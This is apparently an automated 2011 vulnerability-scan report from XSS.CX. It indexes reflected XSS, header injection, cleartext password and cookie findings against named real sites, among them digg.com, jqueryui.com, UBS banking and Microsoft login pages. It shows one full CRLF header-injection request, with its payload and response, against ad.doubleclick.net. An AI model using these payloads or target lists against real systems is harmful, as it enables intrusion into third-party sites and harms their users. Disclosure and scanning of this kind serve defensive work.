XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07092011-01

Report generated by XSS.CX at Sat Jul 09 06:00:32 CDT 2011.


1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/bzj.techflash/home_page [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [adurl parameter]

2.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [ai parameter]

2.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [client parameter]

2.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [num parameter]

2.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sig parameter]

2.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sz parameter]

2.7. http://adonmax.com/afr.php [campaignid parameter]

2.8. http://adonmax.com/afr.php [name of an arbitrarily supplied request parameter]

2.9. http://adonmax.com/favicon.ico [REST URL parameter 1]

2.10. http://api.mixpanel.com/track/ [callback parameter]

2.11. http://api.viximo.com/api/v3/publishers/bebo.json [callback parameter]

2.12. https://blog.metricstream.com/ [name of an arbitrarily supplied request parameter]

2.13. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

2.14. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

2.15. http://digg.com/ [name of an arbitrarily supplied request parameter]

2.16. http://digg.com/ajax/submit/crawl [REST URL parameter 1]

2.17. http://digg.com/ajax/submit/crawl [REST URL parameter 2]

2.18. http://digg.com/ajax/submit/crawl [REST URL parameter 3]

2.19. http://digg.com/login [REST URL parameter 1]

2.20. http://digg.com/register [REST URL parameter 1]

2.21. http://digg.com/search [REST URL parameter 1]

2.22. http://digg.com/submit [REST URL parameter 1]

2.23. http://digg.com/topic [REST URL parameter 1]

2.24. http://digg.com/upcoming [REST URL parameter 1]

2.25. http://jqueryui.com/themeroller/ [bgColorActive parameter]

2.26. http://jqueryui.com/themeroller/ [bgColorContent parameter]

2.27. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

2.28. http://jqueryui.com/themeroller/ [bgColorError parameter]

2.29. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

2.30. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

2.31. http://jqueryui.com/themeroller/ [bgColorHover parameter]

2.32. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

2.33. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

2.42. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

2.43. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

2.44. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

2.45. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

2.46. http://jqueryui.com/themeroller/ [bgTextureError parameter]

2.47. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

2.48. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

2.49. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

2.50. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

2.51. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

2.52. http://jqueryui.com/themeroller/ [borderColorActive parameter]

2.53. http://jqueryui.com/themeroller/ [borderColorContent parameter]

2.54. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

2.55. http://jqueryui.com/themeroller/ [borderColorError parameter]

2.56. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

2.57. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

2.58. http://jqueryui.com/themeroller/ [borderColorHover parameter]

2.59. http://jqueryui.com/themeroller/ [cornerRadius parameter]

2.60. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

2.61. http://jqueryui.com/themeroller/ [fcActive parameter]

2.62. http://jqueryui.com/themeroller/ [fcContent parameter]

2.63. http://jqueryui.com/themeroller/ [fcDefault parameter]

2.64. http://jqueryui.com/themeroller/ [fcError parameter]

2.65. http://jqueryui.com/themeroller/ [fcHeader parameter]

2.66. http://jqueryui.com/themeroller/ [fcHighlight parameter]

2.67. http://jqueryui.com/themeroller/ [fcHover parameter]

2.68. http://jqueryui.com/themeroller/ [ffDefault parameter]

2.69. http://jqueryui.com/themeroller/ [fsDefault parameter]

2.70. http://jqueryui.com/themeroller/ [fwDefault parameter]

2.71. http://jqueryui.com/themeroller/ [iconColorActive parameter]

2.72. http://jqueryui.com/themeroller/ [iconColorContent parameter]

2.73. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

2.74. http://jqueryui.com/themeroller/ [iconColorError parameter]

2.75. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

2.76. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

2.77. http://jqueryui.com/themeroller/ [iconColorHover parameter]

2.78. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.79. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

2.80. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

2.81. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

2.82. http://jqueryui.com/themeroller/ [opacityShadow parameter]

2.83. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

2.84. http://js.revsci.net/gateway/gw.js [csid parameter]

2.85. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.86. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.87. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.88. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.89. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

2.90. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

2.91. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

2.92. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.93. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.94. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.95. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.96. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.97. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.98. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.99. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.100. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

3. Flash cross-domain policy

3.1. http://ad.doubleclick.net/crossdomain.xml

3.2. http://adx.adnxs.com/crossdomain.xml

3.3. http://bp.specificclick.net/crossdomain.xml

3.4. http://core.insightexpressai.com/crossdomain.xml

3.5. http://ecn.dev.virtualearth.net/crossdomain.xml

3.6. http://idcs.interclick.com/crossdomain.xml

3.7. http://rs.gwallet.com/crossdomain.xml

3.8. http://bstats.adbrite.com/crossdomain.xml

3.9. http://cdn.stumble-upon.com/crossdomain.xml

3.10. http://feeds.bbci.co.uk/crossdomain.xml

3.11. http://googleads.g.doubleclick.net/crossdomain.xml

3.12. http://newsrss.bbc.co.uk/crossdomain.xml

3.13. http://api.twitter.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

4.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml

4.3. http://profile.live.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://digg.com/

5.2. http://digg.com/login

5.3. http://digg.com/login

5.4. http://digg.com/register

5.5. http://digg.com/register

5.6. http://digg.com/search

5.7. http://digg.com/submit

5.8. http://digg.com/topic

5.9. http://digg.com/upcoming

5.10. http://manage.softlayer.mobi/

6. SSL cookie without secure flag set

6.1. https://accountservices.passport.net/gethip.srf

6.2. https://ebanking.ubs.com/en/

6.3. https://live.zune.net/xweb/passport/bottomCB.aspx

6.4. https://live.zune.net/xweb/passport/rightCB.aspx

6.5. https://live.zune.net/xweb/passport/topCB.aspx

6.6. https://login.live.com/login.srf

6.7. https://login.live.com/pp1100/

6.8. https://login.live.com/ppsecure/post.srf

6.9. https://login.live.com/ppsecure/secure.srf

6.10. https://login.live.com/resetpw.srf

6.11. https://msnia.login.live.com/ppsecure/post.srf

6.12. https://quotes-public.ubs.com/

7. Session token in URL

7.1. https://manage.softlayer.com/

7.2. https://manage.softlayer.com/Sales/orderComputingInstance

7.3. https://manage.softlayer.com/index/index

8. Password field submitted using GET method

8.1. http://digg.com/

8.2. http://digg.com/login

8.3. http://digg.com/register

8.4. http://digg.com/search

8.5. http://digg.com/submit

8.6. http://digg.com/topic

8.7. http://digg.com/upcoming

9. Cookie scoped to parent domain

9.1. https://accountservices.passport.net/gethip.srf

9.2. http://api.twitter.com/1/statuses/user_timeline.json

9.3. http://c.microsoft.com/trans_pixel.aspx

9.4. http://ads.revsci.net/adserver/ako

9.5. http://ads.revsci.net/adserver/ako

9.6. http://adx.adnxs.com/mapuid

9.7. http://b.scorecardresearch.com/b

9.8. http://b.scorecardresearch.com/p

9.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.11. http://bstats.adbrite.com/adserver/behavioral-data/0

9.12. http://cang.baidu.com/do/add

9.13. http://clk.atdmt.com/MRT/go/285207471/direct/01/

9.14. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

9.15. https://ebanking.ubs.com/en/

9.16. http://ib.adnxs.com/seg

9.17. http://idcs.interclick.com/Segment.aspx

9.18. http://js.revsci.net/gateway/gw.js

9.19. http://leadback.advertising.com/adcedge/lb

9.20. https://live.zune.net/xweb/passport/bottomCB.aspx

9.21. https://live.zune.net/xweb/passport/rightCB.aspx

9.22. https://live.zune.net/xweb/passport/topCB.aspx

9.23. http://m.adnxs.com/msftcookiehandler

9.24. https://msnia.login.live.com/ppsecure/post.srf

9.25. http://p.brilig.com/contact/bct

9.26. http://pix04.revsci.net/D08734/a1/0/0/0.gif

9.27. http://pix04.revsci.net/G10937/a4/0/0/0.302

9.28. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js

9.29. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js

9.30. http://pixel.quantserve.com/pixel

9.31. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif

9.32. http://profile.live.com/badge/

9.33. https://quotes-public.ubs.com/

9.34. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home

9.35. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de

9.36. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en

9.37. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr

9.38. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it

9.39. http://r.turn.com/r/beacon

9.40. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

9.41. http://rs.gwallet.com/r1/pixel/x1094

9.42. http://rs.gwallet.com/r1/pixel/x1225

9.43. http://rs.gwallet.com/r1/pixel/x368

9.44. http://rs.gwallet.com/r1/pixel/x369

10. Cookie without HttpOnly flag set

10.1. http://about.digg.com/

10.2. http://about.digg.com/ads

10.3. http://about.digg.com/blog

10.4. http://about.digg.com/contact

10.5. http://about.digg.com/faq

10.6. http://about.digg.com/partnership

10.7. http://about.digg.com/privacy

10.8. http://about.digg.com/terms-use

10.9. https://accountservices.passport.net/gethip.srf

10.10. http://c.microsoft.com/trans_pixel.aspx

10.11. http://developers.digg.com/

10.12. http://jobs.digg.com/

10.13. http://knowledgelayer.softlayer.com/

10.14. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm

10.15. https://nae.ubs.com/quotes

10.16. https://nae.ubs.com/quotes/markets_instruments

10.17. http://ping.fm/ref/

10.18. http://ad.yieldmanager.com/pixel

10.19. http://adonmax.com/afr.php

10.20. http://ads.revsci.net/adserver/ako

10.21. http://ads.revsci.net/adserver/ako

10.22. http://b.scorecardresearch.com/b

10.23. http://b.scorecardresearch.com/p

10.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.26. http://bstats.adbrite.com/adserver/behavioral-data/0

10.27. http://cang.baidu.com/do/add

10.28. http://clk.atdmt.com/MRT/go/285207471/direct/01/

10.29. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

10.30. http://delicious.com/save

10.31. http://digg.com/

10.32. http://digg.com/upcoming

10.33. http://friendfeed.com/share

10.34. http://idcs.interclick.com/Segment.aspx

10.35. http://js.revsci.net/gateway/gw.js

10.36. http://leadback.advertising.com/adcedge/lb

10.37. https://live.zune.net/xweb/passport/bottomCB.aspx

10.38. https://live.zune.net/xweb/passport/rightCB.aspx

10.39. https://live.zune.net/xweb/passport/topCB.aspx

10.40. https://login.live.com/login.srf

10.41. https://login.live.com/pp1100/

10.42. https://login.live.com/ppsecure/post.srf

10.43. https://login.live.com/ppsecure/secure.srf

10.44. https://login.live.com/resetpw.srf

10.45. http://m.webtrends.com/dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif

10.46. http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif

10.47. http://m.webtrends.com/dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif

10.48. http://m.webtrends.com/dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif

10.49. https://msnia.login.live.com/ppsecure/post.srf

10.50. http://p.brilig.com/contact/bct

10.51. http://pinpoint.microsoft.com/en-US/Default.aspx

10.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif

10.53. http://pix04.revsci.net/G10937/a4/0/0/0.302

10.54. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js

10.55. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js

10.56. http://pixel.quantserve.com/pixel

10.57. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif

10.58. http://profile.live.com/badge/

10.59. http://promote.orkut.com/preview

10.60. https://quotes-public.ubs.com/

10.61. https://quotes-public1.ubs.com/app/CGT/Workbench/

10.62. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home

10.63. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de

10.64. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en

10.65. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr

10.66. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it

10.67. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_mi

10.68. http://r.turn.com/r/beacon

10.69. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

10.70. http://rs.gwallet.com/r1/pixel/x1094

10.71. http://rs.gwallet.com/r1/pixel/x1225

10.72. http://rs.gwallet.com/r1/pixel/x368

10.73. http://rs.gwallet.com/r1/pixel/x369

11. Password field with autocomplete enabled

11.1. https://clientlogin.ibb.ubs.com/login

11.2. http://digg.com/

11.3. http://digg.com/login

11.4. http://digg.com/login

11.5. http://digg.com/register

11.6. http://digg.com/register

11.7. http://digg.com/search

11.8. http://digg.com/submit

11.9. http://digg.com/submit

11.10. http://digg.com/submit

11.11. http://digg.com/topic

11.12. http://digg.com/upcoming

11.13. https://foton-ewm-es.ubs.com/safe-login/Login

11.14. https://fundgate.ubs.com/GIS/Default.aspx

11.15. https://manage.softlayer.com/

11.16. https://manage.softlayer.com/Sales/orderComputingInstance

11.17. https://manage.softlayer.com/index/index

11.18. http://manage.softlayer.mobi/

11.19. https://onlineservices.ubs.com/olsauth/ex/pbl/lo

11.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp

11.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

11.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

11.23. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl

11.24. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

11.25. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

11.26. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

12. Source code disclosure

13. Referer-dependent response

14. Cross-domain POST

14.1. https://accountservices.passport.net/uiresetpw.srf

14.2. https://blog.metricstream.com/

14.3. https://login.live.com/resetpw.srf

14.4. https://login.live.com/resetpw.srf

15. Cross-domain Referer leakage

15.1. https://accountservices.passport.net/gethip.srf

15.2. https://accountservices.passport.net/uiresetpw.srf

15.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

15.4. http://ad.doubleclick.net/adj/bzj.techflash/

15.5. http://ad.doubleclick.net/adj/bzj.techflash/

15.6. http://ad.doubleclick.net/adj/bzj.techflash/home_page

15.7. http://ad.doubleclick.net/adj/bzj.techflash/home_page

15.8. http://adonmax.com/afr.php

15.9. http://bcp.crwdcntrl.net/px

15.10. http://bp.specificclick.net/

15.11. http://cm.g.doubleclick.net/pixel

15.12. http://cm.g.doubleclick.net/pixel

15.13. http://digg.com/submit

15.14. http://go.microsoft.com/fwlink/

15.15. http://googleads.g.doubleclick.net/pagead/ads

15.16. http://jqueryui.com/themeroller/

15.17. http://live.zune.net/signin.ashx

15.18. http://live.zune.net/signin.ashx

15.19. http://live.zune.net/signin.ashx

15.20. https://login.live.com/login.srf

15.21. https://login.live.com/ppsecure/post.srf

15.22. http://p.brilig.com/contact/bct

15.23. http://pinpoint.microsoft.com/en-US/Default.aspx

15.24. http://promote.orkut.com/preview

15.25. http://pubads.g.doubleclick.net/gampad/ads

15.26. http://pubads.g.doubleclick.net/gampad/ads

15.27. http://pubads.g.doubleclick.net/gampad/ads

15.28. http://s.bebo.com/c/site/index20_script.js

15.29. http://s.bebo.com/js/mediaboxAdv-1.3.4b.js

16. Cross-domain script include

16.1. http://about.digg.com/

16.2. http://about.digg.com/ads

16.3. http://about.digg.com/blog

16.4. http://about.digg.com/contact

16.5. http://about.digg.com/faq

16.6. http://about.digg.com/partnership

16.7. http://about.digg.com/privacy

16.8. http://about.digg.com/terms-use

16.9. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

16.10. http://analytics.microsoft.com/Sync.html

16.11. http://analytics.msn.com/Include.html

16.12. http://bcp.crwdcntrl.net/px

16.13. https://blog.metricstream.com/

16.14. http://blog.softlayer.com/

16.15. http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

16.16. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2010/12/10/microsoft-adds-new-defendant-in-click-laundering-lawsuit.aspx

16.17. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

16.18. http://developers.digg.com/

16.19. http://digg.com/

16.20. http://digg.com/login

16.21. http://digg.com/register

16.22. http://digg.com/search

16.23. http://digg.com/submit

16.24. http://digg.com/topic

16.25. http://digg.com/upcoming

16.26. http://docs.jquery.com/Tutorials:Introducing_$(document

16.27. http://docs.jquery.com/UI

16.28. http://docs.jquery.com/UI/Accordion

16.29. http://docs.jquery.com/UI/Effects/

16.30. http://docs.jquery.com/UI/Effects/Slide

16.31. http://googleads.g.doubleclick.net/pagead/ads

16.32. http://jobs.digg.com/

16.33. http://jquery.com/

16.34. http://jquery.malsup.com/cycle/

16.35. http://jqueryui.com/about

16.36. http://jqueryui.com/themeroller/

16.37. http://malsup.com/jquery/cycle/

16.38. http://medienfreunde.com/lab/innerfade/

16.39. http://pubads.g.doubleclick.net/gampad/ads

16.40. http://pubads.g.doubleclick.net/gampad/ads

17. TRACE method is enabled

17.1. http://bp.specificclick.net/

17.2. http://cdn1.diggstatic.com/

17.3. http://crl.globalsign.net/

17.4. http://digg.com/

18. Email addresses disclosed

18.1. http://about.digg.com/privacy

18.2. http://about.digg.com/terms-use

18.3. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

18.4. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js

18.5. http://bstats.adbrite.com/adserver/behavioral-data/0

18.6. http://cdn1.viximo.com/api_assets/ca02f696b/javascripts/api/v3/vixui.js

18.7. https://foton-ewm-es.ubs.com/safe-login/Login

18.8. http://jqueryui.com/about

18.9. https://login.live.com/login.srf

18.10. https://login.live.com/pp1100/

18.11. https://login.live.com/ppsecure/post.srf

18.12. https://login.live.com/ppsecure/secure.srf

18.13. https://manage.softlayer.com/

18.14. https://manage.softlayer.com/Sales/orderComputingInstance

18.15. https://manage.softlayer.com/index/index

18.16. https://msnia.login.live.com/ppsecure/post.srf

18.17. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dna

18.18. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp

18.19. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp

18.20. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp

18.21. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

18.22. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp

18.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp

18.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp

18.25. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

18.26. http://s.bebo.com/js/mootools-core-and-more-1.3.js

19. Private IP addresses disclosed

19.1. http://digg.com/

19.2. http://digg.com/ajax/submit/crawl

19.3. http://digg.com/login

19.4. http://digg.com/register

19.5. http://digg.com/search

19.6. http://digg.com/submit

19.7. http://digg.com/submit

19.8. http://digg.com/submit

19.9. http://digg.com/submit

19.10. http://digg.com/topic

19.11. http://digg.com/upcoming

20. Credit card numbers disclosed

21. Robots.txt file

21.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

21.2. http://api.twitter.com/receiver.html

21.3. http://cdn.stumble-upon.com/css/global_su.css

21.4. http://crl.globalsign.net/Root.crl

21.5. http://digg.com/submit

21.6. http://feeds.bbci.co.uk/news/rss.xml

21.7. http://googleads.g.doubleclick.net/pagead/ads

21.8. https://login.live.com/login.srf

21.9. https://manage.softlayer.com/Sales/orderComputingInstance

21.10. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

21.11. http://profile.live.com/badge/

22. Cacheable HTTPS response

22.1. https://blog.metricstream.com/

22.2. https://clientlogin.ibb.ubs.com/AuthSSO/html/clientservices.html

22.3. https://clientlogin.ibb.ubs.com/AuthSSO/html/request_login.html

22.4. https://clientlogin.ibb.ubs.com/AuthSSO/html/securityguidelines.html

22.5. https://live.zune.net/xweb/passport/leftCB.aspx

22.6. https://login.live.com/pp1100/RDHelper_JS.srf

22.7. https://manage.softlayer.com/

22.8. https://manage.softlayer.com/Sales/orderComputingInstance

22.9. https://manage.softlayer.com/favicon.ico

22.10. https://manage.softlayer.com/index/index

22.11. https://nae.ubs.com/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

22.12. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

22.13. https://nae.ubs.com/favicon.ico

22.14. https://onesource.ubs.com/

22.15. https://onlineservices.ubs.com/

22.16. https://onlineservices.ubs.com/favicon.ico

22.17. https://onlineservices.ubs.com/olsauth/ex/pbl/lo

22.18. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp

22.19. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

22.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl

22.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

22.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

22.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp

22.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp

22.25. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp

22.26. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

22.27. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp

22.28. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp

22.29. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp

22.30. https://onlineservices.ubs.com/staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf

22.31. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

22.32. https://onlineservices.ubs.com/staticfiles/pws/adobe/StatementofFinancialCondition.pdf

23. HTML does not specify charset

23.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

23.2. http://analytics.microsoft.com/Sync.html

23.3. http://analytics.msn.com/Include.html

23.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

23.5. https://fundgate.ubs.com/GIS/Default.aspx

23.6. http://jqueryui.com/about

23.7. http://jqueryui.com/themeroller/

23.8. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm

23.9. https://nae.ubs.com/quotes

23.10. https://nae.ubs.com/quotes/markets_instruments

23.11. https://onesource.ubs.com/

23.12. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

23.13. http://p.brilig.com/contact/bct

23.14. http://pixel.invitemedia.com/data_sync

24. HTML uses unrecognised charset

24.1. http://adonmax.com/afr.php

24.2. http://cang.baidu.com/do/add

25. Content type incorrectly stated

25.1. http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif

25.2. http://a1.twimg.com/profile_images/336090389/CM_linkedin_normal.gif

25.3. https://accountservices.passport.net/gethip.srf

25.4. http://api.mixpanel.com/track/

25.5. http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

25.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.7. https://login.live.com/pp1100/RDHelper_JS.srf

25.8. https://manage.softlayer.com/favicon.ico

25.9. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg

25.10. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg

25.11. https://nae.ubs.com/favicon.ico

25.12. http://s.bebo.com/js/mootools-core-and-more-1.3.js

26. Content type is not specified

26.1. https://ebanking-us.ubs.com/safeloginu/Login

26.2. https://foton-ewm-de.ubs.com/safe-login/Login

26.3. https://foton-ewm-es.ubs.com/safe-login/Login

26.4. https://login.live.com/hiphelp.srf

27. SSL certificate

27.1. https://clientlogin.ibb.ubs.com/

27.2. https://login.live.com/

27.3. https://manage.softlayer.com/

27.4. https://onlineservices.ubs.com/



1. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.doubleclick.net/ad/bzj.techflash/home_page [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/bzj.techflash/home_page

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49448%0d%0a875587022d3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49448%0d%0a875587022d3/bzj.techflash/home_page;beh=;pos=but3;vs=commercial;sz=125x125;kw=seattle;ord=1309960820 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49448
875587022d3
/bzj.techflash/home_page;beh=;pos=but3;vs=commercial;sz=125x125;kw=seattle;ord=1309960820:
Date: Wed, 06 Jul 2011 14:01:08 GMT
Server: GFE/2.0

